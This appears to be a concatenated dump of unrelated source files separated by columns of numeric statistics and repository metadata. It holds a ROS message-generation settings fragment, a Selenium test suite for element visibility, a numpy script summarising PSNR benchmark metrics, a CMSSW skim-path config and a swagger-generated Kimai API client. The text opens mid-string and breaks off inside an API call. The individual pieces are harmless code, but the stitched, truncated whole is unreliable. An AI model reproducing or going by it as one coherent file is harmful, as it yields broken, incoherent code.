atcher/src/mavros/mavros_msgs/srv/ParamPull.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/ParamPush.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/ParamSet.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/SetMavFrame.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/SetMode.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/StreamRate.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/VehicleInfoGet.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/WaypointClear.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/WaypointPull.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/WaypointPush.srv;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/srv/WaypointSetCurrent.srv"
# Name of the ROS package the generated code belongs to.
pkg_name = "mavros_msgs"
# Message packages this package's messages depend on, ';'-separated.
dependencies_str = "geographic_msgs;geometry_msgs;sensor_msgs;std_msgs"
# Code generators to run (C++, EusLisp, Common Lisp, Node.js, Python).
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
# Alternating package-name;msg-directory pairs used to resolve dependencies.
dep_include_paths_str = "mavros_msgs;/home/arijitnoobstar/UAVProjectileCatcher/src/mavros/mavros_msgs/msg;geographic_msgs;/opt/ros/melodic/share/geographic_msgs/cmake/../msg;geometry_msgs;/opt/ros/melodic/share/geometry_msgs/cmake/../msg;sensor_msgs;/opt/ros/melodic/share/sensor_msgs/cmake/../msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg;uuid_msgs;/opt/ros/melodic/share/uuid_msgs/cmake/../msg"
# Interpreter used to run the Python-based generators.
PYTHON_EXECUTABLE = "/usr/bin/python2"
# Evaluates to False here: '' != 'TRUE' means no pre-generated static sources.
package_has_static_sources = '' == 'TRUE'
# Helper script that verifies message dependencies are fully declared.
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 716.083333
| 4,689
| 0.874782
| 1,033
| 8,593
| 7.155857
| 0.140368
| 0.127165
| 0.472944
| 0.510281
| 0.798566
| 0.783685
| 0.783685
| 0.783685
| 0.758523
| 0
| 0
| 0.000234
| 0.003957
| 8,593
| 11
| 4,690
| 781.181818
| 0.863419
| 0.005702
| 0
| 0
| 1
| 0.333333
| 0.976235
| 0.972606
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
7e8cfba675ed7689eefe309de0560a8877742ee7
| 14,224
|
py
|
Python
|
misc/webdriver-w3c-tests/element_state/visibility_test.py
|
chenxix/crosswalk-test-suite
|
a2353dd2df912334cf6489f99bc0af4e091079a0
|
[
"BSD-3-Clause"
] | null | null | null |
misc/webdriver-w3c-tests/element_state/visibility_test.py
|
chenxix/crosswalk-test-suite
|
a2353dd2df912334cf6489f99bc0af4e091079a0
|
[
"BSD-3-Clause"
] | null | null | null |
misc/webdriver-w3c-tests/element_state/visibility_test.py
|
chenxix/crosswalk-test-suite
|
a2353dd2df912334cf6489f99bc0af4e091079a0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- mode: python; fill-column: 100; comment-column: 100; -*-
import os
import sys
import unittest
from selenium.common.exceptions import ElementNotVisibleException
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
import base_test
class NaturalNonVisibleElementsTest(base_test.WebDriverBaseTest):
    """Visibility tests for elements that are hidden 'naturally' — zero size,
    hidden form inputs, overflow clipping, off-viewport placement, transforms
    and colour camouflage — without an explicit display/visibility rule.

    Fixes in this revision: the method test_element_scrollable_by_overflow_y_is_visible
    was defined twice (the second definition silently shadowed the first); the
    duplicate has been removed. Locals named 'input' no longer shadow the builtin.
    """

    def test_0x0_pixel_element_is_not_visible(self):
        self.driver.get(self.webserver.where_is("element_state/res/0x0-pixels.html"))
        el = self.driver.find_element_by_css("div")
        self.assertFalse(el.is_displayed())

    def test_0x0_pixel_text_node_is_visible(self):
        self.driver.get(self.webserver.where_is("element_state/res/0x0-pixels-text-node.html"))
        el = self.driver.find_element_by_css("p")
        self.assertTrue(el.is_displayed())

    def test_1x1_pixel_element(self):
        self.driver.get(self.webserver.where_is("element_state/res/1x1-pixels.html"))
        el = self.driver.find_element_by_css("p")
        self.assertTrue(el.is_displayed())

    def test_zero_sized_element_is_shown_if_decendant_has_size(self):
        self.driver.get(self.webserver.where_is("element_state/res/zero-sized-element-with-sizable-decendant.html"))
        parent = self.driver.find_element_by_id("parent")
        child = self.driver.find_element_by_id("child")
        self.assertTrue(parent.is_displayed())
        self.assertTrue(child.is_displayed())

    def test_input_type_hidden_is_never_visible(self):
        self.driver.get(self.webserver.where_is("element_state/res/input-type-hidden.html"))
        # Renamed local from 'input' to avoid shadowing the builtin.
        hidden_input = self.driver.find_element_by_css("input")
        self.assertFalse(hidden_input.is_displayed())

    def test_input_morphs_into_hidden(self):
        self.driver.get(self.webserver.where_is("element_state/res/input-morphs-into-hidden.html"))
        morphed_input = self.driver.find_element_by_css("input")
        self.assertFalse(morphed_input.is_displayed())

    def test_parent_node_visible_when_all_children_are_absolutely_positioned_and_overflow_is_hidden(self):
        # Not implemented. NOTE(review): a near-duplicate with a typo'd name
        # ("..._are_absolutely_position_...") exists below; both are kept to
        # preserve the test surface.
        pass

    def test_parent_of_absolutely_positioned_elements_visible_where_ancestor_overflow_is_hidden(self):
        """When a parent's ancestor hides any overflow, absolutely positioned child elements are
        still visible. The parent container is also considered visible by webdriver for this
        reason because it is interactable."""
        self.driver.get(self.webserver.where_is("element_state/res/absolute-children-ancestor-hidden-overflow.html"))
        ancestor = self.driver.find_element_by_css("body")
        assert not ancestor.is_displayed()
        children = self.driver.find_elements_by_class(".child")
        assert all(child.is_displayed() for child in children)
        parent = self.driver.find_element_by_id("parent")
        assert parent.is_displayed()

    def test_element_hidden_by_overflow_x_is_not_visible(self):
        # TODO(andreastt): This test should probably be split in three. Also it's making two
        # assertions.
        pages = ["element_state/res/x-hidden-y-hidden.html",
                 "element_state/res/x-hidden-y-scroll.html",
                 "element_state/res/x-hidden-y-auto.html"]
        for page in pages:
            self.driver.get(self.webserver.where_is(page))
            right = self.driver.find_element_by_id("right")
            bottom_right = self.driver.find_element_by_id("bottom-right")
            self.assertFalse(right.is_displayed())
            self.assertFalse(bottom_right.is_displayed())

    def test_element_hidden_by_overflow_y_is_not_visible(self):
        # TODO(andreastt): This test should probably be split in three. Also it's making two
        # assertions.
        pages = ["element_state/res/x-hidden-y-hidden.html",
                 "element_state/res/x-scroll-y-hidden.html",
                 "element_state/res/x-auto-y-hidden.html"]
        for page in pages:
            self.driver.get(self.webserver.where_is(page))
            bottom = self.driver.find_element_by_id("bottom")
            bottom_right = self.driver.find_element_by_id("bottom-right")
            self.assertFalse(bottom.is_displayed())
            self.assertFalse(bottom_right.is_displayed())

    def test_parent_node_visible_when_all_children_are_absolutely_position_and_overflow_is_hidden(self):
        # Not implemented (typo'd near-duplicate of the method above; kept so
        # the public test name set is unchanged).
        pass

    def test_element_scrollable_by_overflow_x_is_visible(self):
        # Not implemented.
        pass

    def test_element_scrollable_by_overflow_y_is_visible(self):
        # Not implemented. This method was accidentally defined twice in the
        # original file; the redundant second definition has been removed.
        pass

    def test_element_scrollable_by_overflow_x_and_y_is_visible(self):
        # Not implemented.
        pass

    def test_element_outside_viewport(self):
        self.driver.get(self.webserver.where_is("element_state/res/element-outside-viewport.html"))
        hidden = self.driver.find_element_by_css("div")
        self.assertFalse(hidden.is_displayed())

    def test_element_dynamically_moved_outside_viewport(self):
        self.driver.get(self.webserver.where_is("element_state/res/element-dynamically-moved-outside-viewport.html"))
        hidden = self.driver.find_element_by_css("div")
        self.assertFalse(hidden.is_displayed())

    def test_element_hidden_by_other_element(self):
        self.driver.get(self.webserver.where_is("element_state/res/element-hidden-by-other-element.html"))
        overlay = self.driver.find_element_by_id("overlay")
        hidden = self.driver.find_element_by_id("hidden")
        self.assertTrue(overlay.is_displayed())
        self.assertFalse(hidden.is_displayed())

    def test_element_partially_hidden_by_other_element(self):
        self.driver.get(self.webserver.where_is("element_state/res/element-partially-hidden-by-other-element.html"))
        partial = self.driver.find_element_by_id("partial")
        self.assertTrue(partial.is_displayed())

    def test_element_hidden_by_z_index(self):
        self.driver.get(self.webserver.where_is("element_state/res/element-hidden-by-z-index.html"))
        overlay = self.driver.find_element_by_id("overlay")
        hidden = self.driver.find_element_by_id("hidden")
        self.assertTrue(overlay.is_displayed())
        self.assertFalse(hidden.is_displayed())

    def test_element_moved_outside_viewport_by_transform(self):
        self.driver.get(self.webserver.where_is("element_state/res/element-moved-outside-viewport-by-transform.html"))
        el = self.driver.find_element_by_css("div")
        self.assertFalse(el.is_displayed())

    def test_element_moved_behind_other_element_by_transform(self):
        self.driver.get(self.webserver.where_is("element_state/res/element-moved-behind-other-element-by-transform.html"))
        overlay = self.driver.find_element_by_id("overlay")
        hidden = self.driver.find_element_by_id("hidden")
        self.assertTrue(overlay.is_displayed())
        self.assertFalse(hidden.is_displayed())

    def test_text_with_same_color_as_background(self):
        self.driver.get(self.webserver.where_is("element_state/res/text-with-same-color-as-background.html"))
        p = self.driver.find_element_by_css("p")
        self.assertFalse(p.is_displayed())

    def test_text_with_same_color_as_parent_background(self):
        self.driver.get(self.webserver.where_is("element_state/res/text-with-same-color-as-parent-background.html"))
        p = self.driver.find_element_by_css("p")
        self.assertFalse(p.is_displayed())

    def test_text_with_matching_color_and_background(self):
        self.driver.get(self.webserver.where_is("element_state/res/text-with-matching-color-and-background.html"))
        p = self.driver.find_element_by_css("p")
        self.assertTrue(p.is_displayed())

    def test_element_with_same_color_as_background(self):
        self.driver.get(self.webserver.where_is("element_state/res/element-with-same-color-as-background.html"))
        el = self.driver.find_element_by_css("div")
        self.assertFalse(el.is_displayed())

    def test_element_with_same_color_as_parent_background(self):
        self.driver.get(self.webserver.where_is("element_state/res/element-with-same-color-as-parent-background.html"))
        hidden = self.driver.find_element_by_id("hidden")
        self.assertFalse(hidden.is_displayed())
class DisplayTest(base_test.WebDriverBaseTest):
    """Checks that WebDriver's is_displayed() honours the CSS ``display``
    property: ``display: none`` hides an element and its entire subtree,
    regardless of what the descendants declare."""

    def test_display_block(self):
        url = self.webserver.where_is("element_state/res/display-block.html")
        self.driver.get(url)
        self.assertTrue(self.driver.find_element_by_css("p").is_displayed())

    def test_display_none(self):
        url = self.webserver.where_is("element_state/res/display-none.html")
        self.driver.get(url)
        self.assertFalse(self.driver.find_element_by_css("p").is_displayed())

    def test_display_none_hides_child_node(self):
        url = self.webserver.where_is("element_state/res/display-none-child.html")
        self.driver.get(url)
        # Both the hidden parent and its child must report not displayed.
        for element_id in ("parent", "child"):
            node = self.driver.find_element_by_id(element_id)
            self.assertFalse(node.is_displayed())

    def test_display_none_hides_child_node_link(self):
        url = self.webserver.where_is("element_state/res/display-none-child-link.html")
        self.driver.get(url)
        self.assertFalse(self.driver.find_element_by_id("child").is_displayed())

    def test_display_none_hides_child_node_paragraph(self):
        url = self.webserver.where_is("element_state/res/display-none-child-paragraph.html")
        self.driver.get(url)
        self.assertFalse(self.driver.find_element_by_id("child").is_displayed())

    def test_display_none_on_parent_takes_presedence(self):
        url = self.webserver.where_is("element_state/res/display-none-parent-presedence.html")
        self.driver.get(url)
        self.assertFalse(self.driver.find_element_by_id("child").is_displayed())

    def test_display_none_on_parent_takes_presedence_over_visibility_visible(self):
        url = self.webserver.where_is("element_state/res/display-none-parent-presedence-visibility.html")
        self.driver.get(url)
        self.assertFalse(self.driver.find_element_by_id("child").is_displayed())

    def test_display_none_hidden_dynamically(self):
        url = self.webserver.where_is("element_state/res/display-none-dynamic.html")
        self.driver.get(url)
        self.assertFalse(self.driver.find_element_by_id("hidden").is_displayed())
class VisibilityTest(base_test.WebDriverBaseTest):
    """Checks how ``visibility: hidden`` and the HTML ``hidden`` attribute
    affect is_displayed(); unlike ``display: none``, a child may override
    the parent's hidden visibility with ``visibility: visible``."""

    def test_element_state_hidden(self):
        url = self.webserver.where_is("element_state/res/visibility-hidden.html")
        self.driver.get(url)
        self.assertFalse(self.driver.find_element_by_css("p").is_displayed())

    def test_element_state_visible(self):
        url = self.webserver.where_is("element_state/res/visibility-visible.html")
        self.driver.get(url)
        self.assertTrue(self.driver.find_element_by_css("p").is_displayed())

    def test_visibility_hidden_hides_child_node(self):
        url = self.webserver.where_is("element_state/res/visibility-child.html")
        self.driver.get(url)
        for element_id in ("parent", "child"):
            self.assertFalse(self.driver.find_element_by_id(element_id).is_displayed())

    def test_visibility_hidden_hides_child_node_link(self):
        url = self.webserver.where_is("element_state/res/visibility-child-link.html")
        self.driver.get(url)
        for element_id in ("parent", "child"):
            self.assertFalse(self.driver.find_element_by_id(element_id).is_displayed())

    def test_visibility_hidden_hides_child_node_paragraph(self):
        url = self.webserver.where_is("element_state/res/visibility-child-paragraph.html")
        self.driver.get(url)
        for element_id in ("parent", "child"):
            self.assertFalse(self.driver.find_element_by_id(element_id).is_displayed())

    def test_visibility_hidden_on_child_takes_presedence(self):
        url = self.webserver.where_is("element_state/res/visibility-child-presedence.html")
        self.driver.get(url)
        self.assertTrue(self.driver.find_element_by_id("child").is_displayed())

    def test_visibility_hidden_on_parent_takes_presedence_over_display_block(self):
        # Not implemented.
        pass

    def test_visibility_hidden_set_dynamically(self):
        # Not implemented.
        pass

    def test_should_show_element_not_visible_with_hidden_attribute(self):
        url = self.webserver.where_is("element_state/res/hidden.html")
        self.driver.get(url)
        target = self.driver.find_element('id', 'singleHidden')
        self.assertFalse(target.is_displayed())

    def test_should_show_element_not_visible_when_parent_element_has_hidden_attribute(self):
        url = self.webserver.where_is("element_state/res/hidden.html")
        self.driver.get(url)
        self.assertFalse(self.driver.find_element('id', 'child').is_displayed())
class VisibilityInteractionTest(base_test.WebDriverBaseTest):
    """Hidden form controls must reject interaction: clicking, toggling and
    typing all raise ElementNotVisibleException."""

    def test_input_hidden_is_unclickable(self):
        url = self.webserver.where_is("element_state/res/input-type-hidden-unclickable.html")
        self.driver.get(url)
        # Local renamed from 'input' so the builtin is not shadowed.
        hidden_input = self.driver.find_element_by_css("input")
        with self.assertRaises(ElementNotVisibleException):
            hidden_input.click()

    def test_hidden_input_checkbox_is_untogglable(self):
        url = self.webserver.where_is("element_state/res/hidden-input-type-checkbox-untogglable.html")
        self.driver.get(url)
        hidden_checkbox = self.driver.find_element_by_css("input")
        with self.assertRaises(ElementNotVisibleException):
            hidden_checkbox.click()

    def test_typing_in_hidden_input_is_impossible(self):
        url = self.webserver.where_is("element_state/res/hidden-input-type-text-writing.html")
        self.driver.get(url)
        hidden_textfield = self.driver.find_element_by_css("input")
        with self.assertRaises(ElementNotVisibleException):
            hidden_textfield.send_keys("Koha is a popular Indian cheese")
# Placeholder suite: no opacity-related visibility tests implemented yet.
class OpacityTest(base_test.WebDriverBaseTest):
    pass
# Allow running this module directly as a unittest script.
if __name__ == "__main__":
    unittest.main()
| 45.736334
| 122
| 0.731299
| 1,925
| 14,224
| 5.086753
| 0.092468
| 0.093954
| 0.074346
| 0.109375
| 0.837316
| 0.811683
| 0.790952
| 0.751838
| 0.731005
| 0.718239
| 0
| 0.0015
| 0.156074
| 14,224
| 310
| 123
| 45.883871
| 0.814229
| 0.03234
| 0
| 0.466667
| 0
| 0
| 0.177537
| 0.155845
| 0
| 0
| 0.000437
| 0.003226
| 0.231111
| 1
| 0.213333
| false
| 0.04
| 0.022222
| 0
| 0.257778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e1ee0c7fab79db37d1432b18856a59881df3fe4
| 6,635
|
py
|
Python
|
result_metric/result_metric_MoEx.py
|
MelonDLI/ATSPrivacy
|
2cf4bd67c9c0c69092b63dcdc3d06b33acf32812
|
[
"MIT"
] | null | null | null |
result_metric/result_metric_MoEx.py
|
MelonDLI/ATSPrivacy
|
2cf4bd67c9c0c69092b63dcdc3d06b33acf32812
|
[
"MIT"
] | null | null | null |
result_metric/result_metric_MoEx.py
|
MelonDLI/ATSPrivacy
|
2cf4bd67c9c0c69092b63dcdc3d06b33acf32812
|
[
"MIT"
] | null | null | null |
import numpy as np

# Results directory produced by the ATSPrivacy benchmark runs.
_BASE = '/home/remote/u7076589/ATSPrivacy/benchmark/images'


def summarize_metrics(path, label):
    """Load one benchmark metric.npy and print its test-PSNR summary.

    Prints the record count, the printed experiment label, the average
    test PSNR and the maximum test PSNR — byte-identical output to the
    original copy-pasted stanzas.

    :param path: path to a metric.npy file, an object array of dicts each
        carrying a 'test_psnr' entry.
    :param label: experiment name used as the printed heading.
    """
    result = np.load(path, allow_pickle=True)
    sum_ = 0
    max_psnr = 0
    for record in result:
        psnr = record['test_psnr']
        sum_ += psnr
        if psnr > max_psnr:
            max_psnr = psnr
    print('----------------------------------')
    print('number of result:{}'.format(len(result)))
    print('{}:'.format(label))
    # NOTE: an empty result file raises ZeroDivisionError here, exactly as
    # the original inline code did.
    print('average: {}'.format(sum_ / len(result)))
    print('max:{}'.format(max_psnr))


# (auglist suffix, printed label) for each experiment to report.
# Previously-reported groups (38-3-7, 17-33-45 and their combinations) can be
# re-enabled by adding their pairs here.
_EXPERIMENTS = [
    ('42-3-18+29-3-41', 'MoEx 42-3-18+29-3-41'),
    ('29-3-41', 'MoEx+29-3-41'),
    ('42-3-18', 'MoEx 42-3-18'),
    ('43-18-18+3-1-7', 'MoEx+43-18-18+3-1-7'),
    ('3-1-7+43-18-18', 'ResNet+3-1-7+43-18-18'),
    ('43-18-18', 'ResNet+43-18-18'),
    ('3-1-7', 'ResNet+3-1-7'),
    ('', 'ResNet'),
]

if __name__ == '__main__':
    # Guarded so the module can be imported without touching the filesystem.
    for auglist, label in _EXPERIMENTS:
        path = ('{}/MoEx_data_cifar100_arch_ResNet20-4_epoch_200_optim_'
                'inversed_mode_aug_auglist_{}_rlabel_False/metric.npy'
                ).format(_BASE, auglist)
        summarize_metrics(path, label)
| 39.96988
| 176
| 0.674604
| 1,032
| 6,635
| 4.070736
| 0.060078
| 0.073316
| 0.086408
| 0.117829
| 0.994763
| 0.994763
| 0.993811
| 0.992383
| 0.992383
| 0.992383
| 0
| 0.066038
| 0.089375
| 6,635
| 166
| 177
| 39.96988
| 0.629262
| 0.287415
| 0
| 0.838095
| 0
| 0.066667
| 0.466196
| 0.336329
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009524
| 0
| 0.009524
| 0.380952
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e76e87e53656c552a94032fe88c1f3cfff5810f
| 152
|
py
|
Python
|
RecoBTag/Skimming/python/btagMC_QCD_380_470_SkimPaths_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
RecoBTag/Skimming/python/btagMC_QCD_380_470_SkimPaths_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
RecoBTag/Skimming/python/btagMC_QCD_380_470_SkimPaths_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
# CMSSW configuration fragment: declares the skim path for the
# btagMC_QCD_380_470 b-tag MC sample.
import FWCore.ParameterSet.Config as cms
from RecoBTag.Skimming.btagMC_QCD_380_470_cfi import *
# Path that runs the btagMC_QCD_380_470 filter sequence imported above.
btagMC_QCD_380_470Path = cms.Path(btagMC_QCD_380_470)
| 25.333333
| 54
| 0.855263
| 25
| 152
| 4.8
| 0.64
| 0.225
| 0.3
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129496
| 0.085526
| 152
| 5
| 55
| 30.4
| 0.733813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ea36a6287c6284e0f0f9e2e53432d62f96dc1d8
| 34,343
|
py
|
Python
|
kimai_python/api/activity_api.py
|
MPW1412/kimai-python
|
7c89b0866b85fbc4b1092b30eca21f1be48db533
|
[
"MIT"
] | null | null | null |
kimai_python/api/activity_api.py
|
MPW1412/kimai-python
|
7c89b0866b85fbc4b1092b30eca21f1be48db533
|
[
"MIT"
] | null | null | null |
kimai_python/api/activity_api.py
|
MPW1412/kimai-python
|
7c89b0866b85fbc4b1092b30eca21f1be48db533
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Kimai 2 - API Docs
JSON API for the Kimai 2 time-tracking software. Read more about its usage in the [API documentation](https://www.kimai.org/documentation/rest-api.html) and then download a [Swagger file](doc.json) for import e.g. in Postman. Be aware: it is not yet considered stable and BC breaks might happen. # noqa: E501
OpenAPI spec version: 0.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from kimai_python.api_client import ApiClient
class ActivityApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Create the API wrapper, building a default ApiClient when none is given."""
    self.api_client = ApiClient() if api_client is None else api_client
def api_activities_get(self, **kwargs):  # noqa: E501
    """Returns a collection of activities  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_get(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str project: Project ID to filter activities
    :param str projects: Comma separated list of project IDs to filter activities
    :param str visible: Visibility status to filter activities. Allowed values: 1=visible, 2=hidden, 3=all (default: 1)
    :param str globals: Use if you want to fetch only global activities. Allowed values: true (default: false)
    :param str globals_first: Deprecated parameter, value is not used any more
    :param str order_by: The field by which results will be ordered. Allowed values: id, name, project (default: name)
    :param str order: The result order. Allowed values: ASC, DESC (default: ASC)
    :param str term: Free search term
    :return: list[ActivityCollection], or the request thread when async.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.api_activities_get_with_http_info(**kwargs)  # noqa: E501
    return self.api_activities_get_with_http_info(**kwargs)  # noqa: E501
def api_activities_get_with_http_info(self, **kwargs):  # noqa: E501
    """Returns a collection of activities  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.api_activities_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str project: Project ID to filter activities
    :param str projects: Comma separated list of project IDs to filter activities
    :param str visible: Visibility status to filter activities. Allowed values: 1=visible, 2=hidden, 3=all (default: 1)
    :param str globals: Use if you want to fetch only global activities. Allowed values: true (default: false)
    :param str globals_first: Deprecated parameter, value is not used any more
    :param str order_by: The field by which results will be ordered. Allowed values: id, name, project (default: name)
    :param str order: The result order. Allowed values: ASC, DESC (default: ASC)
    :param str term: Free search term
    :return: list[ActivityCollection]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['project', 'projects', 'visible', 'globals', 'globals_first', 'order_by', 'order', 'term']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_activities_get" % key
            )
        params[key] = val
    del params['kwargs']

    # BUG FIX: the generated patterns were r'\\d+' and r'[\\d|,]+' — inside a
    # raw string that is a literal backslash followed by 'd', so every
    # legitimate numeric `project`/`projects` value was rejected with a
    # ValueError. The intended patterns (matching the error text `/\d+/` and
    # `/[\d|,]+/`) are r'\d+' and r'[\d|,]+'.
    if 'project' in params and not re.search(r'\d+', params['project']):  # noqa: E501
        raise ValueError("Invalid value for parameter `project` when calling `api_activities_get`, must conform to the pattern `/\\d+/`")  # noqa: E501
    if 'projects' in params and not re.search(r'[\d|,]+', params['projects']):  # noqa: E501
        raise ValueError("Invalid value for parameter `projects` when calling `api_activities_get`, must conform to the pattern `/[\\d|,]+/`")  # noqa: E501
    if 'visible' in params and not re.search(r'1|2|3', params['visible']):  # noqa: E501
        raise ValueError("Invalid value for parameter `visible` when calling `api_activities_get`, must conform to the pattern `/1|2|3/`")  # noqa: E501
    if 'globals' in params and not re.search(r'true', params['globals']):  # noqa: E501
        raise ValueError("Invalid value for parameter `globals` when calling `api_activities_get`, must conform to the pattern `/true/`")  # noqa: E501
    if 'globals_first' in params and not re.search(r'true|false', params['globals_first']):  # noqa: E501
        raise ValueError("Invalid value for parameter `globals_first` when calling `api_activities_get`, must conform to the pattern `/true|false/`")  # noqa: E501
    if 'order_by' in params and not re.search(r'id|name|project', params['order_by']):  # noqa: E501
        raise ValueError("Invalid value for parameter `order_by` when calling `api_activities_get`, must conform to the pattern `/id|name|project/`")  # noqa: E501
    if 'order' in params and not re.search(r'ASC|DESC', params['order']):  # noqa: E501
        raise ValueError("Invalid value for parameter `order` when calling `api_activities_get`, must conform to the pattern `/ASC|DESC/`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    # Map snake_case kwargs onto the API's camelCase query parameter names.
    query_params = []
    if 'project' in params:
        query_params.append(('project', params['project']))  # noqa: E501
    if 'projects' in params:
        query_params.append(('projects', params['projects']))  # noqa: E501
    if 'visible' in params:
        query_params.append(('visible', params['visible']))  # noqa: E501
    if 'globals' in params:
        query_params.append(('globals', params['globals']))  # noqa: E501
    if 'globals_first' in params:
        query_params.append(('globalsFirst', params['globals_first']))  # noqa: E501
    if 'order_by' in params:
        query_params.append(('orderBy', params['order_by']))  # noqa: E501
    if 'order' in params:
        query_params.append(('order', params['order']))  # noqa: E501
    if 'term' in params:
        query_params.append(('term', params['term']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # Authentication setting
    auth_settings = ['apiToken', 'apiUser']  # noqa: E501

    return self.api_client.call_api(
        '/api/activities', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[ActivityCollection]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def api_activities_id_get(self, id, **kwargs):  # noqa: E501
    """Returns one activity  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: Activity ID to fetch (required)
    :return: ActivityEntity, or the request thread when async.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.api_activities_id_get_with_http_info(id, **kwargs)  # noqa: E501
    return self.api_activities_id_get_with_http_info(id, **kwargs)  # noqa: E501
def api_activities_id_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """Returns one activity  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: Activity ID to fetch (required)
    :return: ActivityEntity, or the request thread when async.
    """
    all_params = ['id', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_activities_id_get" % key
            )
        params[key] = val
    del params['kwargs']

    # reject a missing required 'id'
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `api_activities_id_get`")  # noqa: E501

    path_params = {'id': params['id']}

    # Authentication setting
    auth_settings = ['apiToken', 'apiUser']  # noqa: E501

    return self.api_client.call_api(
        '/api/activities/{id}', 'GET',
        path_params,
        [],  # query params
        {},  # header params
        body=None,
        post_params=[],
        files={},
